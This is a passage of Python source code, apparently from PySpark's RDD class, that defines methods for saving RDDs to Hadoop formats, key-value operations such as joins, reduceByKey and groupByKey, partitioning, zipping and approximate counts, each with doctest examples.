res = self.context.runJob(self, takeUpToNumLeft, p)
items += res
partsScanned += numPartsToTry
return items[:num]
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
>>> sc.parallelize([]).first()
Traceback (most recent call last):
...
ValueError: RDD is empty
"""
rs = self.take(1)
if rs:
return rs[0]
raise ValueError("RDD is empty")
def isEmpty(self):
"""
Returns true if and only if the RDD contains no elements at all.
.. note:: an RDD may be empty even when it has at least 1 partition.
>>> sc.parallelize([]).isEmpty()
True
>>> sc.parallelize([1]).isEmpty()
False
"""
return self.getNumPartitions() == 0 or len(self.take(1)) == 0
def saveAsNewAPIHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, True)
def saveAsNewAPIHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop job configuration, passed in as a dict (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter, jconf)
def saveAsHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, False)
def saveAsHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None,
compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: (None by default)
:param compressionCodecClass: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter,
jconf, compressionCodecClass)
def saveAsSequenceFile(self, path, compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the L{org.apache.hadoop.io.Writable} types that we convert from the
RDD's key and value types. The mechanism is as follows:
1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects.
2. Keys and values of this Java RDD are converted to Writables and written out.
:param path: path to sequence file
:param compressionCodecClass: (None by default)
"""
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsSequenceFile(pickledRDD._jrdd, True,
path, compressionCodecClass)
def saveAsPickleFile(self, path, batchSize=10):
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is L{pyspark.serializers.PickleSerializer}, default batch size
is 10.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).map(str).collect())
['1', '2', 'rdd', 'spark']
"""
if batchSize == 0:
ser = AutoBatchedSerializer(PickleSerializer())
else:
ser = BatchedSerializer(PickleSerializer(), batchSize)
self._reserialize(ser)._jrdd.saveAsObjectFile(path)
@ignore_unicode_prefix
def saveAsTextFile(self, path, compressionCodecClass=None):
"""
Save this RDD as a text file, using string representations of elements.
@param path: path to text file
@param compressionCodecClass: (None by default) string i.e.
"org.apache.hadoop.io.compress.GzipCodec"
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
Using compressionCodecClass
>>> tempFile3 = NamedTemporaryFile(delete=True)
>>> tempFile3.close()
>>> codec = "org.apache.hadoop.io.compress.GzipCodec"
>>> sc.parallelize(['foo', 'bar']).saveAsTextFile(tempFile3.name, codec)
>>> from fileinput import input, hook_compressed
>>> result = sorted(input(glob(tempFile3.name + "/part*.gz"), openhook=hook_compressed))
>>> b''.join(result).decode('utf-8')
u'bar\\nfoo\\n'
"""
def func(split, iterator):
for x in iterator:
if not isinstance(x, (unicode, bytes)):
x = unicode(x)
if isinstance(x, unicode):
x = x.encode("utf-8")
yield x
keyed = self.mapPartitionsWithIndex(func)
keyed._bypass_serializer = True
if compressionCodecClass:
compressionCodec = self.ctx._jvm.java.lang.Class.forName(compressionCodecClass)
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path, compressionCodec)
else:
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
.. note:: this method should only be used if the resulting data is expected
to be small, as all the data is loaded into the driver's memory.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda x: x[0])
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda x: x[1])
def reduceByKey(self, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative and commutative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be partitioned with C{numPartitions} partitions, or
the default parallelism level if C{numPartitions} is not specified.
Default partitioner is hash-partition.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions, partitionFunc)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative and commutative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
func = fail_on_stopiteration(func)
def reducePartition(iterator):
m = {}
for k, v in iterator:
m[k] = func(m[k], v) if k in m else v
yield m
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] = func(m1[k], v) if k in m1 else v
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in C{self} and (k, v2) is in C{other}.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, w) in C{other}, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
def fullOuterJoin(self, other, numPartitions=None):
"""
        Perform a full outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Similarly, for each element (k, w) in C{other}, the resulting RDD will
either contain all pairs (k, (v, w)) for v in C{self}, or the pair
(k, (None, w)) if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("c", 8)])
>>> sorted(x.fullOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))]
"""
return python_full_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
# portable_hash is used as the default because the builtin hash of None differs
# across machines.
def partitionBy(self, numPartitions, partitionFunc=portable_hash):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> len(set(sets[0]).intersection(set(sets[1])))
0
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
partitioner = Partitioner(numPartitions, partitionFunc)
if self.partitioner == partitioner:
return self
# Transferring O(n) objects to Java is too expensive.
# Instead, we'll form the hash buckets in Python,
# transferring O(numPartitions) objects to Java.
# Each object is a (splitNumber, [objects]) pair.
# To avoid overly large objects, the objects are
# grouped into chunks.
outputSerializer = self.ctx._unbatched_serializer
limit = (_parse_memory(self.ctx._conf.get(
"spark.python.worker.memory", "512m")) / 2)
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
c, batch = 0, min(10 * numPartitions, 1000)
for k, v in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v))
c += 1
# check used memory and avg size of chunk of objects
if (c % 1000 == 0 and get_used_memory() > limit
or c > batch):
n, size = len(buckets), 0
for split in list(buckets.keys()):
yield pack_long(split)
d = outputSerializer.dumps(buckets[split])
del buckets[split]
yield d
size += len(d)
avg = int(size / n) >> 20
# let 1M < avg < 10M
if avg < 1:
batch *= 1.5
elif avg > 10:
batch = max(int(batch / 1.5), 1)
c = 0
for split, items in buckets.items():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = self.mapPartitionsWithIndex(add_shuffle_key, preservesPartitioning=True)
keyed._bypass_serializer = True
with SCCallSiteSync(self.context) as css:
pairRDD = self.ctx._jvm.PairwiseRDD(
keyed._jrdd.rdd()).asJavaPairRDD()
jpartitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
id(partitionFunc))
jrdd = self.ctx._jvm.PythonRDD.valueOfPair(pairRDD.partitionBy(jpartitioner))
rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
rdd.partitioner = partitioner
return rdd
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None, partitionFunc=portable_hash):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C.
Users provide three functions:
- C{createCombiner}, which turns a V into a C (e.g., creates
a one-element list)
- C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
a list)
- C{mergeCombiners}, to combine two C's into a single one (e.g., merges
the lists)
To avoid memory allocation, both mergeValue and mergeCombiners are allowed to
modify and return their first argument instead of creating a new C.
In addition, users can control the partitioning of the output RDD.
.. note:: V and C can be different -- for example, one might group an RDD of type
(Int, Int) into an RDD of type (Int, List[Int]).
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 2)])
>>> def to_list(a):
... return [a]
...
>>> def append(a, b):
... a.append(b)
... return a
...
>>> def extend(a, b):
... a.extend(b)
... return a
...
>>> sorted(x.combineByKey(to_list, append, extend).collect())
[('a', [1, 2]), ('b', [1])]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
serializer = self.ctx.serializer
memory = self._memory_limit()
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combineLocally(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combineLocally, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def _mergeCombiners(iterator):
merger = ExternalMerger(agg, memory, serializer)
merger.mergeCombiners(iterator)
return merger.items()
return shuffled.mapPartitions(_mergeCombiners, preservesPartitioning=True)
def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None,
partitionFunc=portable_hash):
"""
Aggregate the values of each key, using given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
a U and one operation for merging two U's. The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
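An illustrative example, computing a per-key (sum, count) pair:
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 2)])
>>> seqOp = (lambda acc, v: (acc[0] + v, acc[1] + 1))
>>> combOp = (lambda a, b: (a[0] + b[0], a[1] + b[1]))
>>> sorted(rdd.aggregateByKey((0, 0), seqOp, combOp).collect())
[('a', (3, 2)), ('b', (1, 1))]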
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions, partitionFunc)
def foldByKey(self, zeroValue, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
(e.g., 0 for addition, or 1 for multiplication).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> sorted(rdd.foldByKey(0, add).collect())
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions,
partitionFunc)
def _memory_limit(self):
return _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None, partitionFunc=portable_hash):
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD with numPartitions partitions.
.. note:: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey or aggregateByKey will
provide much better performance.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.groupByKey().mapValues(len).collect())
[('a', 2), ('b', 1)]
>>> sorted(rdd.groupByKey().mapValues(list).collect())
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
a.extend(b)
return a
memory = self._memory_limit()
serializer = self._jrdd_deserializer
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combine(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combine, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def groupByKey(it):
merger = ExternalGroupBy(agg, memory, serializer)
merger.mergeCombiners(it)
return merger.items()
return shuffled.mapPartitions(groupByKey, True).mapValues(ResultIterable)
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda kv: ((kv[0], x) for x in f(kv[1]))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda kv: (kv[0], f(kv[1]))
return self.map(map_values_fn, preservesPartitioning=True)
def groupWith(self, other, *others):
"""
Alias for cogroup but with support for multiple RDDs.
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(w.groupWith(x, y, z).collect()))]
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
# TODO: add variant with custom partitioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in C{self} or C{other}, return a resulting RDD that
contains a tuple with the list of values for that key in C{self} as
well as C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(x.cogroup(y).collect()))]
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup((self, other), numPartitions)
def sampleByKey(self, withReplacement, fractions, seed=None):
"""
Return a subset of this RDD sampled by key (via stratified sampling).
Create a sample of this RDD using variable sampling rates for
different keys as specified by fractions, a key to sampling rate map.
>>> fractions = {"a": 0.2, "b": 0.1}
>>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000)))
>>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect())
>>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150
True
>>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0
True
>>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0
True
"""
for fraction in fractions.values():
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(
RDDStratifiedSampler(withReplacement, fractions, seed).func, True)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in C{self} that has no pair with matching
key in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func(pair):
key, (val1, val2) = pair
return val1 and not val2
return self.cogroup(other, numPartitions).filter(filter_func).flatMapValues(lambda x: x[0])
def subtract(self, other, numPartitions=None):
"""
Return each value in C{self} that is not contained in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys()
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying C{f}.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> [(x, list(map(list, y))) for x, y in sorted(x.cogroup(y).collect())]
[(0, [[0], [0]]), (1, [[1], [1]]), (2, [[], [2]]), (3, [[], [3]]), (4, [[2], [4]])]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
return self.coalesce(numPartitions, shuffle=True)
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
if shuffle:
# Decrease the batch size in order to distribute evenly the elements across output
# partitions. Otherwise, repartition will possibly produce highly skewed partitions.
batchSize = min(10, self.ctx._batchSize or 1024)
ser = BatchedSerializer(PickleSerializer(), batchSize)
selfCopy = self._reserialize(ser)
jrdd_deserializer = selfCopy._jrdd_deserializer
jrdd = selfCopy._jrdd.coalesce(numPartitions, shuffle)
else:
jrdd_deserializer = self._jrdd_deserializer
jrdd = self._jrdd.coalesce(numPartitions, shuffle)
return RDD(jrdd, self.ctx, jrdd_deserializer)
def zip(self, other):
"""
Zips this RDD with another one, returning key-value pairs with the
first element in each RDD, the second element in each RDD, and so on. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
def get_batch_size(ser):
if isinstance(ser, BatchedSerializer):
return ser.batchSize
return 1 # not batched
def batch_as(rdd, batchSize):
return rdd._reserialize(BatchedSerializer(PickleSerializer(), batchSize))
my_batch = get_batch_size(self._jrdd_deserializer)
other_batch = get_batch_size(other._jrdd_deserializer)
if my_batch != other_batch or not my_batch:
# use the smallest batchSize for both of them
batchSize = min(my_batch, other_batch)
if batchSize <= 0:
# auto batched or unlimited
batchSize = 100
other = batch_as(other, batchSize)
self = batch_as(self, batchSize)
if self.getNumPartitions() != other.getNumPartitions():
raise ValueError("Can only zip with RDD which has the same number of partitions")
# There will be an Exception in the JVM if there are different numbers
# of items in each partition.
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def zipWithIndex(self):
"""
Zips this RDD with its element indices.
The ordering is first based on the partition index and then the
ordering of items within each partition. So the first item in
the first partition gets index 0, and the last item in the last
partition receives the largest index.
This method needs to trigger a Spark job when this RDD contains
more than one partition.
>>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect()
[('a', 0), ('b', 1), ('c', 2), ('d', 3)]
"""
starts = [0]
if self.getNumPartitions() > 1:
nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect()
for i in range(len(nums) - 1):
starts.append(starts[-1] + nums[i])
def func(k, it):
for i, v in enumerate(it, starts[k]):
yield v, i
return self.mapPartitionsWithIndex(func)
def zipWithUniqueId(self):
"""
Zips this RDD with generated unique Long ids.
Items in the kth partition will get ids k, n+k, 2*n+k, ..., where
n is the number of partitions, so there may be gaps. Unlike L{zipWithIndex},
this method won't trigger a Spark job.
>>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect()
[('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)]
"""
n = self.getNumPartitions()
def func(k, it):
for i, v in enumerate(it):
yield v, i * n + k
return self.mapPartitionsWithIndex(func)
def name(self):
"""
Return the name of this RDD.
"""
n = self._jrdd.name()
if n:
return n
@ignore_unicode_prefix
def setName(self, name):
"""
Assign a name to this RDD.
>>> rdd1 = sc.parallelize([1, 2])
>>> rdd1.setName('RDD1').name()
u'RDD1'
"""
self._jrdd.setName(name)
return self
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
if debug_string:
return debug_string.encode('utf-8')
def getStorageLevel(self):
"""
Get the RDD's current storage level.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication())
return storage_level
def _defaultReducePartitions(self):
"""
Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
If spark.default.parallelism is set, then we'll use the value from SparkContext
defaultParallelism, otherwise we'll use the number of partitions in this RDD.
This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
be inherent.
"""
if self.ctx._conf.contains("spark.default.parallelism"):
return self.ctx.defaultParallelism
else:
return self.getNumPartitions()
def lookup(self, key):
"""
Return the list of values in the RDD for key `key`. This operation
is done efficiently if the RDD has a known partitioner by only
searching the partition that the key maps to.
>>> l = range(1000)
>>> rdd = sc.parallelize(zip(l, l), 10)
>>> rdd.lookup(42) # slow
[42]
>>> sorted = rdd.sortByKey()
>>> sorted.lookup(42) # fast
[42]
>>> sorted.lookup(1024)
[]
>>> rdd2 = sc.parallelize([(('a', 'b'), 'c')]).groupByKey()
>>> list(rdd2.lookup(('a', 'b'))[0])
['c']
"""
values = self.filter(lambda kv: kv[0] == key).values()
if self.partitioner is not None:
return self.ctx.runJob(values, lambda x: x, [self.partitioner(key)])
return values.collect()
def _to_java_object_rdd(self):
""" Return a JavaRDD of Object by unpickling
It will convert each Python object into a Java object with Pyrolite, whether the
RDD is serialized in batch or not.
"""
rdd = self._pickled()
return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True)
def countApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate version of count() that returns a potentially incomplete
result within a timeout, even if not all tasks have finished.
>>> rdd = sc.parallelize(range(1000), 10)
>>> rdd.countApprox(1000, 1.0)
1000
"""
drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))])
return int(drdd.sumApprox(timeout, confidence))
def sumApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the sum within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000))
>>> abs(rdd.sumApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.sumApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def meanApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the mean within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000)) / 1000.0
>>> abs(rdd.meanApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.map(float)._to_java_object_rdd()
